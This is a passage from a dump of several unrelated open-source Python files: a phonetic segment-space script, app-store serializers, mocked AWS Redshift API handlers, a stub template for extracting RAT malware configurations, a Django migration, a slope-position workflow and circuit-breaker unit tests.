return ''.join(map(norm, s))
def add_record(flite, ft, orth):
space = Counter()
orth = normpunc(flite, orth)
trans = flite.transliterate(orth)
while trans:
pref = ft.longest_one_seg_prefix(trans)
if pref != '':
space[pref] += 1
trans = trans[len(pref):]
else:
if trans[0] in flite.puncnorm_vals:
space[trans[0]] += 1
else:
space[trans[0]] += 1
trans = trans[1:]
return space
def add_file(flite, ft, fn):
space = Counter()
with codecs.open(fn, 'r', 'utf-8') as f:
for line in f:
fields = line.split(u'\t')
if len(fields) > 0:
orth = fields[0]
space.update(add_record(flite, ft, orth))
logger.debug(u'Length of counter:\t{}'.format(len(space)))
return space
def print_space(output, space):
pairs = enumerate(sorted(filter(lambda x: x, space.keys())))
with open(output, 'wb') as f:
writer = csv.writer(f, encoding='utf-8')
for i, char in pairs:
writer.writerow((i, char))
def main(infiles, output):
flite = epitran.flite.Flite()
ft = panphon.FeatureTable()
space = Counter()
for fn in infiles:
logger.debug(u'Scanning:\t{}'.format(fn).encode('utf-8'))
space.update(add_file(flite, ft, fn))
print_space(output, space)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-o', '--output', help='Output file.')
parser.add_argument('infiles', nargs='+', help='CONLL files serving as basis for segment space.')
args = parser.parse_args()
main(args.infiles, args.output)
| dmort27/epitran | epitran/bin/connl2engipaspace.py | Python | mit | 2,078 |
from rest_framework.serializers import SerializerMethodField
from mkt.collections.serializers import (CollectionSerializer,
CollectionMembershipField)
from mkt.search.serializers import SimpleESAppSerializer
from mkt.webapps.serializers import SimpleAppSerializer
class BaseFireplaceAppSerializer(object):
def get_icons(self, app):
# Fireplace only requires 64px-sized icons.
return {64: app.get_icon_url(64)}
class FireplaceAppSerializer(BaseFireplaceAppSerializer, SimpleAppSerializer):
class Meta(SimpleAppSerializer.Meta):
fields = ['author', 'banner_message', 'banner_regions', 'categories',
'content_ratings', 'current_version', 'description',
'device_types', 'homepage', 'icons', 'id', 'is_packaged',
'manifest_url', 'name', 'payment_required', 'premium_type',
'previews', 'price', 'price_locale', 'privacy_policy',
'public_stats', 'release_notes', 'ratings', 'slug', 'status',
'support_email', 'support_url', 'upsell', 'user']
exclude = []
class FireplaceESAppSerializer(BaseFireplaceAppSerializer,
SimpleESAppSerializer):
weight = SerializerMethodField('get_weight')
class Meta(SimpleESAppSerializer.Meta):
fields = sorted(FireplaceAppSerializer.Meta.fields + ['weight'])
exclude = FireplaceAppSerializer.Meta.exclude
def get_weight(self, obj):
return obj.es_data.get('weight', 1)
def get_user_info(self, app):
# Fireplace search should always be anonymous for extra-cacheability.
return None
class FireplaceCollectionMembershipField(CollectionMembershipField):
app_serializer_classes = {
'es': FireplaceESAppSerializer,
'normal': FireplaceAppSerializer,
}
class FireplaceCollectionSerializer(CollectionSerializer):
apps = FireplaceCollectionMembershipField(many=True, source='apps')
| jinankjain/zamboni | mkt/fireplace/serializers.py | Python | bsd-3-clause | 2,011 |
from __future__ import unicode_literals
import json
import xmltodict
from jinja2 import Template
from six import iteritems
from moto.core.responses import BaseResponse
from .models import redshift_backends
def convert_json_error_to_xml(json_error):
error = json.loads(json_error)
code = error["Error"]["Code"]
message = error["Error"]["Message"]
template = Template(
"""
<RedshiftClientError>
<Error>
<Code>{{ code }}</Code>
<Message>{{ message }}</Message>
<Type>Sender</Type>
</Error>
<RequestId>6876f774-7273-11e4-85dc-39e55ca848d1</RequestId>
</RedshiftClientError>"""
)
return template.render(code=code, message=message)
def itemize(data):
"""
The xmltodict.unparse requires we modify the shape of the input dictionary slightly. Instead of a dict of the form:
{'key': ['value1', 'value2']}
We must provide:
{'key': {'item': ['value1', 'value2']}}
"""
if isinstance(data, dict):
ret = {}
for key in data:
ret[key] = itemize(data[key])
return ret
elif isinstance(data, list):
return {"item": [itemize(value) for value in data]}
else:
return data
class RedshiftResponse(BaseResponse):
@property
def redshift_backend(self):
return redshift_backends[self.region]
def get_response(self, response):
if self.request_json:
return json.dumps(response)
else:
xml = xmltodict.unparse(itemize(response), full_document=False)
if hasattr(xml, "decode"):
xml = xml.decode("utf-8")
return xml
def call_action(self):
status, headers, body = super(RedshiftResponse, self).call_action()
if status >= 400 and not self.request_json:
body = convert_json_error_to_xml(body)
return status, headers, body
def unpack_complex_list_params(self, label, names):
unpacked_list = list()
count = 1
while self._get_param("{0}.{1}.{2}".format(label, count, names[0])):
param = dict()
for i in range(len(names)):
param[names[i]] = self._get_param(
"{0}.{1}.{2}".format(label, count, names[i])
)
unpacked_list.append(param)
count += 1
return unpacked_list
def unpack_list_params(self, label):
unpacked_list = list()
count = 1
while self._get_param("{0}.{1}".format(label, count)):
unpacked_list.append(self._get_param("{0}.{1}".format(label, count)))
count += 1
return unpacked_list
def _get_cluster_security_groups(self):
cluster_security_groups = self._get_multi_param("ClusterSecurityGroups.member")
if not cluster_security_groups:
cluster_security_groups = self._get_multi_param(
"ClusterSecurityGroups.ClusterSecurityGroupName"
)
return cluster_security_groups
def _get_vpc_security_group_ids(self):
vpc_security_group_ids = self._get_multi_param("VpcSecurityGroupIds.member")
if not vpc_security_group_ids:
vpc_security_group_ids = self._get_multi_param(
"VpcSecurityGroupIds.VpcSecurityGroupId"
)
return vpc_security_group_ids
def _get_iam_roles(self):
iam_roles = self._get_multi_param("IamRoles.member")
if not iam_roles:
iam_roles = self._get_multi_param("IamRoles.IamRoleArn")
return iam_roles
def _get_subnet_ids(self):
subnet_ids = self._get_multi_param("SubnetIds.member")
if not subnet_ids:
subnet_ids = self._get_multi_param("SubnetIds.SubnetIdentifier")
return subnet_ids
def create_cluster(self):
cluster_kwargs = {
"cluster_identifier": self._get_param("ClusterIdentifier"),
"node_type": self._get_param("NodeType"),
"master_username": self._get_param("MasterUsername"),
"master_user_password": self._get_param("MasterUserPassword"),
"db_name": self._get_param("DBName"),
"cluster_type": self._get_param("ClusterType"),
"cluster_security_groups": self._get_cluster_security_groups(),
"vpc_security_group_ids": self._get_vpc_security_group_ids(),
"cluster_subnet_group_name": self._get_param("ClusterSubnetGroupName"),
"availability_zone": self._get_param("AvailabilityZone"),
"preferred_maintenance_window": self._get_param(
"PreferredMaintenanceWindow"
),
"cluster_parameter_group_name": self._get_param(
"ClusterParameterGroupName"
),
"automated_snapshot_retention_period": self._get_int_param(
"AutomatedSnapshotRetentionPeriod"
),
"port": self._get_int_param("Port"),
"cluster_version": self._get_param("ClusterVersion"),
"allow_version_upgrade": self._get_bool_param("AllowVersionUpgrade"),
"number_of_nodes": self._get_int_param("NumberOfNodes"),
"publicly_accessible": self._get_param("PubliclyAccessible"),
"encrypted": self._get_param("Encrypted"),
"region_name": self.region,
"tags": self.unpack_complex_list_params("Tags.Tag", ("Key", "Value")),
"iam_roles_arn": self._get_iam_roles(),
"enhanced_vpc_routing": self._get_param("EnhancedVpcRouting"),
"kms_key_id": self._get_param("KmsKeyId"),
}
cluster = self.redshift_backend.create_cluster(**cluster_kwargs).to_json()
cluster["ClusterStatus"] = "creating"
return self.get_response(
{
"CreateClusterResponse": {
"CreateClusterResult": {"Cluster": cluster},
"ResponseMetadata": {
"RequestId": "384ac68d-3775-11df-8963-01868b7c937a"
},
}
}
)
def restore_from_cluster_snapshot(self):
enhanced_vpc_routing = self._get_bool_param("EnhancedVpcRouting")
restore_kwargs = {
"snapshot_identifier": self._get_param("SnapshotIdentifier"),
"cluster_identifier": self._get_param("ClusterIdentifier"),
"port": self._get_int_param("Port"),
"availability_zone": self._get_param("AvailabilityZone"),
"allow_version_upgrade": self._get_bool_param("AllowVersionUpgrade"),
"cluster_subnet_group_name": self._get_param("ClusterSubnetGroupName"),
"publicly_accessible": self._get_param("PubliclyAccessible"),
"cluster_parameter_group_name": self._get_param(
"ClusterParameterGroupName"
),
"cluster_security_groups": self._get_cluster_security_groups(),
"vpc_security_group_ids": self._get_vpc_security_group_ids(),
"preferred_maintenance_window": self._get_param(
"PreferredMaintenanceWindow"
),
"automated_snapshot_retention_period": self._get_int_param(
"AutomatedSnapshotRetentionPeriod"
),
"region_name": self.region,
"iam_roles_arn": self._get_iam_roles(),
}
if enhanced_vpc_routing is not None:
restore_kwargs["enhanced_vpc_routing"] = enhanced_vpc_routing
cluster = self.redshift_backend.restore_from_cluster_snapshot(
**restore_kwargs
).to_json()
cluster["ClusterStatus"] = "creating"
return self.get_response(
{
"RestoreFromClusterSnapshotResponse": {
"RestoreFromClusterSnapshotResult": {"Cluster": cluster},
"ResponseMetadata": {
"RequestId": "384ac68d-3775-11df-8963-01868b7c937a"
},
}
}
)
def describe_clusters(self):
cluster_identifier = self._get_param("ClusterIdentifier")
clusters = self.redshift_backend.describe_clusters(cluster_identifier)
return self.get_response(
{
"DescribeClustersResponse": {
"DescribeClustersResult": {
"Clusters": [cluster.to_json() for cluster in clusters]
},
"ResponseMetadata": {
"RequestId": "384ac68d-3775-11df-8963-01868b7c937a"
},
}
}
)
def modify_cluster(self):
request_kwargs = {
"cluster_identifier": self._get_param("ClusterIdentifier"),
"new_cluster_identifier": self._get_param("NewClusterIdentifier"),
"node_type": self._get_param("NodeType"),
"master_user_password": self._get_param("MasterUserPassword"),
"cluster_type": self._get_param("ClusterType"),
"cluster_security_groups": self._get_cluster_security_groups(),
"vpc_security_group_ids": self._get_vpc_security_group_ids(),
"cluster_subnet_group_name": self._get_param("ClusterSubnetGroupName"),
"preferred_maintenance_window": self._get_param(
"PreferredMaintenanceWindow"
),
"cluster_parameter_group_name": self._get_param(
"ClusterParameterGroupName"
),
"automated_snapshot_retention_period": self._get_int_param(
"AutomatedSnapshotRetentionPeriod"
),
"cluster_version": self._get_param("ClusterVersion"),
"allow_version_upgrade": self._get_bool_param("AllowVersionUpgrade"),
"number_of_nodes": self._get_int_param("NumberOfNodes"),
"publicly_accessible": self._get_param("PubliclyAccessible"),
"encrypted": self._get_param("Encrypted"),
"iam_roles_arn": self._get_iam_roles(),
"enhanced_vpc_routing": self._get_param("EnhancedVpcRouting"),
}
cluster_kwargs = {}
# We only want parameters that were actually passed in, otherwise
# we'll stomp all over our cluster metadata with None values.
for (key, value) in iteritems(request_kwargs):
if value is not None and value != []:
cluster_kwargs[key] = value
cluster = self.redshift_backend.modify_cluster(**cluster_kwargs)
return self.get_response(
{
"ModifyClusterResponse": {
"ModifyClusterResult": {"Cluster": cluster.to_json()},
"ResponseMetadata": {
"RequestId": "384ac68d-3775-11df-8963-01868b7c937a"
},
}
}
)
def delete_cluster(self):
request_kwargs = {
"cluster_identifier": self._get_param("ClusterIdentifier"),
"final_cluster_snapshot_identifier": self._get_param(
"FinalClusterSnapshotIdentifier"
),
"skip_final_snapshot": self._get_bool_param("SkipFinalClusterSnapshot"),
}
cluster = self.redshift_backend.delete_cluster(**request_kwargs)
return self.get_response(
{
"DeleteClusterResponse": {
"DeleteClusterResult": {"Cluster": cluster.to_json()},
"ResponseMetadata": {
"RequestId": "384ac68d-3775-11df-8963-01868b7c937a"
},
}
}
)
def create_cluster_subnet_group(self):
cluster_subnet_group_name = self._get_param("ClusterSubnetGroupName")
description = self._get_param("Description")
subnet_ids = self._get_subnet_ids()
tags = self.unpack_complex_list_params("Tags.Tag", ("Key", "Value"))
subnet_group = self.redshift_backend.create_cluster_subnet_group(
cluster_subnet_group_name=cluster_subnet_group_name,
description=description,
subnet_ids=subnet_ids,
region_name=self.region,
tags=tags,
)
return self.get_response(
{
"CreateClusterSubnetGroupResponse": {
"CreateClusterSubnetGroupResult": {
"ClusterSubnetGroup": subnet_group.to_json()
},
"ResponseMetadata": {
"RequestId": "384ac68d-3775-11df-8963-01868b7c937a"
},
}
}
)
def describe_cluster_subnet_groups(self):
subnet_identifier = self._get_param("ClusterSubnetGroupName")
subnet_groups = self.redshift_backend.describe_cluster_subnet_groups(
subnet_identifier
)
return self.get_response(
{
"DescribeClusterSubnetGroupsResponse": {
"DescribeClusterSubnetGroupsResult": {
"ClusterSubnetGroups": [
subnet_group.to_json() for subnet_group in subnet_groups
]
},
"ResponseMetadata": {
"RequestId": "384ac68d-3775-11df-8963-01868b7c937a"
},
}
}
)
def delete_cluster_subnet_group(self):
subnet_identifier = self._get_param("ClusterSubnetGroupName")
self.redshift_backend.delete_cluster_subnet_group(subnet_identifier)
return self.get_response(
{
"DeleteClusterSubnetGroupResponse": {
"ResponseMetadata": {
"RequestId": "384ac68d-3775-11df-8963-01868b7c937a"
}
}
}
)
def create_cluster_security_group(self):
cluster_security_group_name = self._get_param("ClusterSecurityGroupName")
description = self._get_param("Description")
tags = self.unpack_complex_list_params("Tags.Tag", ("Key", "Value"))
security_group = self.redshift_backend.create_cluster_security_group(
cluster_security_group_name=cluster_security_group_name,
description=description,
region_name=self.region,
tags=tags,
)
return self.get_response(
{
"CreateClusterSecurityGroupResponse": {
"CreateClusterSecurityGroupResult": {
"ClusterSecurityGroup": security_group.to_json()
},
"ResponseMetadata": {
"RequestId": "384ac68d-3775-11df-8963-01868b7c937a"
},
}
}
)
def describe_cluster_security_groups(self):
cluster_security_group_name = self._get_param("ClusterSecurityGroupName")
security_groups = self.redshift_backend.describe_cluster_security_groups(
cluster_security_group_name
)
return self.get_response(
{
"DescribeClusterSecurityGroupsResponse": {
"DescribeClusterSecurityGroupsResult": {
"ClusterSecurityGroups": [
security_group.to_json()
for security_group in security_groups
]
},
"ResponseMetadata": {
"RequestId": "384ac68d-3775-11df-8963-01868b7c937a"
},
}
}
)
def delete_cluster_security_group(self):
security_group_identifier = self._get_param("ClusterSecurityGroupName")
self.redshift_backend.delete_cluster_security_group(security_group_identifier)
return self.get_response(
{
"DeleteClusterSecurityGroupResponse": {
"ResponseMetadata": {
"RequestId": "384ac68d-3775-11df-8963-01868b7c937a"
}
}
}
)
def authorize_cluster_security_group_ingress(self):
cluster_security_group_name = self._get_param("ClusterSecurityGroupName")
cidr_ip = self._get_param("CIDRIP")
security_group = self.redshift_backend.authorize_cluster_security_group_ingress(
cluster_security_group_name, cidr_ip
)
return self.get_response(
{
"AuthorizeClusterSecurityGroupIngressResponse": {
"AuthorizeClusterSecurityGroupIngressResult": {
"ClusterSecurityGroup": {
"ClusterSecurityGroupName": cluster_security_group_name,
"Description": security_group.description,
"IPRanges": [
{
"Status": "authorized",
"CIDRIP": cidr_ip,
"Tags": security_group.tags,
},
],
}
}
}
}
)
def create_cluster_parameter_group(self):
cluster_parameter_group_name = self._get_param("ParameterGroupName")
group_family = self._get_param("ParameterGroupFamily")
description = self._get_param("Description")
tags = self.unpack_complex_list_params("Tags.Tag", ("Key", "Value"))
parameter_group = self.redshift_backend.create_cluster_parameter_group(
cluster_parameter_group_name, group_family, description, self.region, tags
)
return self.get_response(
{
"CreateClusterParameterGroupResponse": {
"CreateClusterParameterGroupResult": {
"ClusterParameterGroup": parameter_group.to_json()
},
"ResponseMetadata": {
"RequestId": "384ac68d-3775-11df-8963-01868b7c937a"
},
}
}
)
def describe_cluster_parameter_groups(self):
cluster_parameter_group_name = self._get_param("ParameterGroupName")
parameter_groups = self.redshift_backend.describe_cluster_parameter_groups(
cluster_parameter_group_name
)
return self.get_response(
{
"DescribeClusterParameterGroupsResponse": {
"DescribeClusterParameterGroupsResult": {
"ParameterGroups": [
parameter_group.to_json()
for parameter_group in parameter_groups
]
},
"ResponseMetadata": {
"RequestId": "384ac68d-3775-11df-8963-01868b7c937a"
},
}
}
)
def delete_cluster_parameter_group(self):
cluster_parameter_group_name = self._get_param("ParameterGroupName")
self.redshift_backend.delete_cluster_parameter_group(
cluster_parameter_group_name
)
return self.get_response(
{
"DeleteClusterParameterGroupResponse": {
"ResponseMetadata": {
"RequestId": "384ac68d-3775-11df-8963-01868b7c937a"
}
}
}
)
def create_cluster_snapshot(self):
cluster_identifier = self._get_param("ClusterIdentifier")
snapshot_identifier = self._get_param("SnapshotIdentifier")
tags = self.unpack_complex_list_params("Tags.Tag", ("Key", "Value"))
snapshot = self.redshift_backend.create_cluster_snapshot(
cluster_identifier, snapshot_identifier, self.region, tags
)
return self.get_response(
{
"CreateClusterSnapshotResponse": {
"CreateClusterSnapshotResult": {"Snapshot": snapshot.to_json()},
"ResponseMetadata": {
"RequestId": "384ac68d-3775-11df-8963-01868b7c937a"
},
}
}
)
def describe_cluster_snapshots(self):
cluster_identifier = self._get_param("ClusterIdentifier")
snapshot_identifier = self._get_param("SnapshotIdentifier")
snapshots = self.redshift_backend.describe_cluster_snapshots(
cluster_identifier, snapshot_identifier
)
return self.get_response(
{
"DescribeClusterSnapshotsResponse": {
"DescribeClusterSnapshotsResult": {
"Snapshots": [snapshot.to_json() for snapshot in snapshots]
},
"ResponseMetadata": {
"RequestId": "384ac68d-3775-11df-8963-01868b7c937a"
},
}
}
)
def delete_cluster_snapshot(self):
snapshot_identifier = self._get_param("SnapshotIdentifier")
snapshot = self.redshift_backend.delete_cluster_snapshot(snapshot_identifier)
return self.get_response(
{
"DeleteClusterSnapshotResponse": {
"DeleteClusterSnapshotResult": {"Snapshot": snapshot.to_json()},
"ResponseMetadata": {
"RequestId": "384ac68d-3775-11df-8963-01868b7c937a"
},
}
}
)
def create_snapshot_copy_grant(self):
copy_grant_kwargs = {
"snapshot_copy_grant_name": self._get_param("SnapshotCopyGrantName"),
"kms_key_id": self._get_param("KmsKeyId"),
"region_name": self._get_param("Region"),
}
copy_grant = self.redshift_backend.create_snapshot_copy_grant(
**copy_grant_kwargs
)
return self.get_response(
{
"CreateSnapshotCopyGrantResponse": {
"CreateSnapshotCopyGrantResult": {
"SnapshotCopyGrant": copy_grant.to_json()
},
"ResponseMetadata": {
"RequestId": "384ac68d-3775-11df-8963-01868b7c937a"
},
}
}
)
def delete_snapshot_copy_grant(self):
copy_grant_kwargs = {
"snapshot_copy_grant_name": self._get_param("SnapshotCopyGrantName")
}
self.redshift_backend.delete_snapshot_copy_grant(**copy_grant_kwargs)
return self.get_response(
{
"DeleteSnapshotCopyGrantResponse": {
"ResponseMetadata": {
"RequestId": "384ac68d-3775-11df-8963-01868b7c937a"
}
}
}
)
def describe_snapshot_copy_grants(self):
copy_grant_kwargs = {
"snapshot_copy_grant_name": self._get_param("SnapshotCopyGrantName")
}
copy_grants = self.redshift_backend.describe_snapshot_copy_grants(
**copy_grant_kwargs
)
return self.get_response(
{
"DescribeSnapshotCopyGrantsResponse": {
"DescribeSnapshotCopyGrantsResult": {
"SnapshotCopyGrants": [
copy_grant.to_json() for copy_grant in copy_grants
]
},
"ResponseMetadata": {
"RequestId": "384ac68d-3775-11df-8963-01868b7c937a"
},
}
}
)
def create_tags(self):
resource_name = self._get_param("ResourceName")
tags = self.unpack_complex_list_params("Tags.Tag", ("Key", "Value"))
self.redshift_backend.create_tags(resource_name, tags)
return self.get_response(
{
"CreateTagsResponse": {
"ResponseMetadata": {
"RequestId": "384ac68d-3775-11df-8963-01868b7c937a"
}
}
}
)
def describe_tags(self):
resource_name = self._get_param("ResourceName")
resource_type = self._get_param("ResourceType")
tagged_resources = self.redshift_backend.describe_tags(
resource_name, resource_type
)
return self.get_response(
{
"DescribeTagsResponse": {
"DescribeTagsResult": {"TaggedResources": tagged_resources},
"ResponseMetadata": {
"RequestId": "384ac68d-3775-11df-8963-01868b7c937a"
},
}
}
)
def delete_tags(self):
resource_name = self._get_param("ResourceName")
tag_keys = self.unpack_list_params("TagKeys.TagKey")
self.redshift_backend.delete_tags(resource_name, tag_keys)
return self.get_response(
{
"DeleteTagsResponse": {
"ResponseMetadata": {
"RequestId": "384ac68d-3775-11df-8963-01868b7c937a"
}
}
}
)
def enable_snapshot_copy(self):
snapshot_copy_kwargs = {
"cluster_identifier": self._get_param("ClusterIdentifier"),
"destination_region": self._get_param("DestinationRegion"),
"retention_period": self._get_param("RetentionPeriod", 7),
"snapshot_copy_grant_name": self._get_param("SnapshotCopyGrantName"),
}
cluster = self.redshift_backend.enable_snapshot_copy(**snapshot_copy_kwargs)
return self.get_response(
{
"EnableSnapshotCopyResponse": {
"EnableSnapshotCopyResult": {"Cluster": cluster.to_json()},
"ResponseMetadata": {
"RequestId": "384ac68d-3775-11df-8963-01868b7c937a"
},
}
}
)
def disable_snapshot_copy(self):
snapshot_copy_kwargs = {
"cluster_identifier": self._get_param("ClusterIdentifier")
}
cluster = self.redshift_backend.disable_snapshot_copy(**snapshot_copy_kwargs)
return self.get_response(
{
"DisableSnapshotCopyResponse": {
"DisableSnapshotCopyResult": {"Cluster": cluster.to_json()},
"ResponseMetadata": {
"RequestId": "384ac68d-3775-11df-8963-01868b7c937a"
},
}
}
)
def modify_snapshot_copy_retention_period(self):
snapshot_copy_kwargs = {
"cluster_identifier": self._get_param("ClusterIdentifier"),
"retention_period": self._get_param("RetentionPeriod"),
}
cluster = self.redshift_backend.modify_snapshot_copy_retention_period(
**snapshot_copy_kwargs
)
return self.get_response(
{
"ModifySnapshotCopyRetentionPeriodResponse": {
"ModifySnapshotCopyRetentionPeriodResult": {
"Clusters": [cluster.to_json()]
},
"ResponseMetadata": {
"RequestId": "384ac68d-3775-11df-8963-01868b7c937a"
},
}
}
)
def get_cluster_credentials(self):
cluster_identifier = self._get_param("ClusterIdentifier")
db_user = self._get_param("DbUser")
auto_create = self._get_bool_param("AutoCreate", False)
duration_seconds = self._get_int_param("DurationSeconds", 900)
cluster_credentials = self.redshift_backend.get_cluster_credentials(
cluster_identifier, db_user, auto_create, duration_seconds
)
return self.get_response(
{
"GetClusterCredentialsResponse": {
"GetClusterCredentialsResult": cluster_credentials,
"ResponseMetadata": {
"RequestId": "384ac68d-3775-11df-8963-01868b7c937a"
},
}
}
)
| william-richard/moto | moto/redshift/responses.py | Python | apache-2.0 | 28,522 |
#!/usr/bin/env python
'''
ArCom Rat Config Decoder
'''
__description__ = 'ArCom Rat Config Extractor'
__author__ = 'Kevin Breen http://techanarchy.net http://malwareconfig.com'
__version__ = '0.1'
__date__ = '2014/04/10'
#Standard Imports Go Here
import os
import sys
import base64
import string
from optparse import OptionParser
#Non Standard Imports
try:
from Crypto.Cipher import Blowfish
except ImportError:
print "[+] Couldn't Import Cipher, try 'sudo pip install pycrypto'"
# Main Decode Function Goes Here
'''
data is a read of the file
Must return a python dict of values
'''
def run(data):
pass
#Helper Functions Go Here
#Recursive Function Goes Here
def runRecursive(folder, output):
counter1 = 0
counter2 = 0
print "[+] Writing Configs to File {0}".format(output)
with open(output, 'a+') as out:
#This line will need changing per Decoder
out.write("Filename,Domain, Port, Install Path, Install Name, StartupKey, Campaign ID, Mutex Main, Mutex Per, YPER, YGRB, Mutex Grabber, Screen Rec Link, Mutex 4, YVID, YIM, No, Smart, Plugins, Flag1, Flag2, Flag3, Flag4, WebPanel, Remote Delay\n")
for server in os.listdir(folder):
fileData = open(os.path.join(folder,server), 'rb').read()
configOut = run(fileData)
if configOut != None:
#This line will need changing per Decoder
out.write('{0},{1},{2},{3},{4},{5},{6},{7},{8},{9},{10},{11},{12},{13},{14},{15},{16},{17},{18},{19},{20},{21},{22},{23},{24},{25}\n'.format(server, configOut["Domain"],configOut["Port"],configOut["Install Path"],configOut["Install Name"],configOut["Startup Key"],configOut["Campaign ID"],configOut["Mutex Main"],configOut["Mutex Per"],configOut["YPER"],configOut["YGRB"],configOut["Mutex Grabber"],configOut["Screen Rec Link"],configOut["Mutex 4"],configOut["YVID"],configOut["YIM"],configOut["NO"],configOut["Smart Broadcast"],configOut["YES"],configOut["Plugins"],configOut["Flag1"],configOut["Flag2"],configOut["Flag3"],configOut["Flag4"],configOut["WebPanel"],configOut["Remote Delay"]))
counter1 += 1
counter2 += 1
print "[+] Decoded {0} out of {1} Files".format(counter1, counter2)
return "Complete"
# Main
if __name__ == "__main__":
parser = OptionParser(usage='usage: %prog inFile outConfig\n' + __description__, version='%prog ' + __version__)
parser.add_option("-r", "--recursive", action='store_true', default=False, help="Recursive Mode")
(options, args) = parser.parse_args()
# If we dont have args quit with help page
if len(args) > 0:
pass
else:
parser.print_help()
sys.exit()
# if we want a recursive extract run this function
if options.recursive == True:
if len(args) == 2:
runRecursive(args[0], args[1])
sys.exit()
else:
print "[+] You need to specify Both Dir to read AND Output File"
parser.print_help()
sys.exit()
# If not recurisve try to open file
try:
print "[+] Reading file"
fileData = open(args[0], 'rb').read()
except:
print "[+] Couldn't Open File {0}".format(args[0])
#Run the config extraction
print "[+] Searching for Config"
config = run(fileData)
#If we have a config figure out where to dump it out.
if config == None:
print "[+] Config not found"
sys.exit()
#if you gave me two args im going to assume the 2nd arg is where you want to save the file
if len(args) == 2:
print "[+] Writing Config to file {0}".format(args[1])
with open(args[1], 'a') as outFile:
for key, value in sorted(config.iteritems()):
clean_value = filter(lambda x: x in string.printable, value)
outFile.write("Key: {0}\t Value: {1}\n".format(key,clean_value))
# if no seconds arg then assume you want it printing to screen
else:
print "[+] Printing Config to screen"
for key, value in sorted(config.iteritems()):
clean_value = filter(lambda x: x in string.printable, value)
print " [-] Key: {0}\t Value: {1}".format(key,clean_value)
print "[+] End of Config"
| 0x0mar/RATDecoders | TEMPLATE.py | Python | gpl-3.0 | 3,894 |
# -*- coding: utf-8 -*-
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('zerver', '0048_enter_sends_default_to_false'),
]
operations = [
migrations.AddField(
model_name='userprofile',
name='pm_content_in_desktop_notifications',
field=models.BooleanField(default=True),
),
]
| mahim97/zulip | zerver/migrations/0049_userprofile_pm_content_in_desktop_notifications.py | Python | apache-2.0 | 404 |
"""Prototype-based fuzzy slope positions.
@author : Liangjun Zhu
@changelog:
- 15-03-20 - lj - initial implementation.
- 17-07-30 - lj - reorganize and incorporate with pygeoc.
"""
from __future__ import absolute_import, unicode_literals
import os
import sys
if os.path.abspath(os.path.join(sys.path[0], '..')) not in sys.path:
sys.path.insert(0, os.path.abspath(os.path.join(sys.path[0], '..')))
from autofuzslppos.Config import get_input_cfgs
from autofuzslppos.FuzzySlpPosInference import fuzzy_inference
from autofuzslppos.PreProcessing import pre_processing
from autofuzslppos.SelectTypLoc import extract_typical_location
def main():
"""Main workflow."""
fuzslppos_cfg = get_input_cfgs()
pre_processing(fuzslppos_cfg)
extract_typical_location(fuzslppos_cfg)
fuzzy_inference(fuzslppos_cfg)
if __name__ == '__main__':
main()
| lreis2415/SEIMS | seims/preprocess/autofuzslppos/main.py | Python | gpl-3.0 | 884 |
import contexts
from unittest import mock
from poll import circuitbreaker, CircuitBrokenError
class WhenAFunctionWithCircuitBreakerDoesNotThrow:
def given_a_call_counter(self):
self.x = 0
self.expected_args = (1, 4, "hello")
self.expected_kwargs = {"blah": "bloh", "bleh": 5}
self.expected_return_value = "some thing that was returned"
def when_i_call_the_circuit_breaker_function(self):
self.result = self.function_to_break(*self.expected_args, **self.expected_kwargs)
def it_should_forward_the_arguments(self):
assert self.args == self.expected_args
def it_should_forward_the_keyword_arguments(self):
assert self.kwargs == self.expected_kwargs
def it_should_call_it_once(self):
assert self.x == 1
def it_should_return_the_result_of_the_function(self):
assert self.result is self.expected_return_value
@circuitbreaker(ValueError, threshold=3, reset_timeout=1)
def function_to_break(self, *args, **kwargs):
self.x += 1
self.args = args
self.kwargs = kwargs
return self.expected_return_value
class WhenAFunctionWithCircuitBreakerThrowsOnceAndTheOnErrorCallbackHasNoParams:
def given_an_exception_to_throw(self):
self.x = 0
self.expected_exception = ValueError()
@circuitbreaker(ValueError, threshold=3, reset_timeout=1, on_error=self.on_error_callback)
def function_to_break():
self.x += 1
raise self.expected_exception
self.function_to_break = function_to_break
def when_i_call_the_circuit_breaker_function(self):
self.exception = contexts.catch(self.function_to_break)
def it_should_bubble_the_exception_out(self):
assert self.exception is self.expected_exception
def it_should_call_the_function_to_break_once(self):
assert self.x == 1
def it_should_call_the_on_error_callback(self):
assert self.on_error_called
def on_error_callback(self):
self.on_error_called = True
class WhenAFunctionWithCircuitBreakerThrowsOnceAndTheOnErrorCallbackHasOneParam:
def given_an_exception_to_throw(self):
self.x = 0
self.expected_exception = ValueError()
@circuitbreaker(ValueError, threshold=3, reset_timeout=1, on_error=self.on_error_callback)
def function_to_break():
self.x += 1
raise self.expected_exception
self.function_to_break = function_to_break
def when_i_call_the_circuit_breaker_function(self):
self.exception = contexts.catch(self.function_to_break)
def it_should_bubble_the_exception_out(self):
assert self.exception is self.expected_exception
def it_should_call_the_function_to_break_once(self):
assert self.x == 1
def it_should_call_the_on_error_callback(self):
assert self.on_error_result is self.expected_exception
def on_error_callback(self, ex):
self.on_error_result = ex
class WhenACircuitBreakerIsOnTheThresholdOfBreaking:
def given_the_function_has_failed_twice(self):
self.expected_exception = ValueError()
contexts.catch(self.function_to_break)
contexts.catch(self.function_to_break)
def when_the_call_fails_again(self):
self.exception = contexts.catch(self.function_to_break)
def it_should_bubble_the_exception_out(self):
assert self.exception is self.expected_exception
@circuitbreaker(ValueError, threshold=3, reset_timeout=1)
def function_to_break(self):
raise self.expected_exception
class WhenCircuitIsBroken:
def given_the_function_has_failed_three_times(self):
self.patch = mock.patch('time.perf_counter', return_value=0)
self.mock = self.patch.start()
self.x = 0
contexts.catch(self.function_to_break)
contexts.catch(self.function_to_break)
contexts.catch(self.function_to_break)
self.x = 0
def when_i_call_the_circuit_breaker_function(self):
self.mock.return_value = 0.5
self.exception = contexts.catch(self.function_to_break)
def it_should_throw_CircuitBrokenError(self):
assert isinstance(self.exception, CircuitBrokenError)
def it_should_say_how_long_it_will_take_to_close_the_circuit(self):
assert self.exception.time_remaining == 0.5
def it_should_not_call_the_function(self):
assert self.x == 0
@circuitbreaker(ValueError, threshold=3, reset_timeout=1)
def function_to_break(self):
self.x += 1
raise ValueError
# 'leaky bucket' functionality
class WhenTheCircuitBreakerWasAboutToTripAndWeWaitForTheTimeout:
def given_the_circuit_was_about_to_be_broken(self):
self.patch = mock.patch('time.perf_counter', return_value=0)
self.mock = self.patch.start()
contexts.catch(self.function_to_break)
self.mock.return_value = 0.5
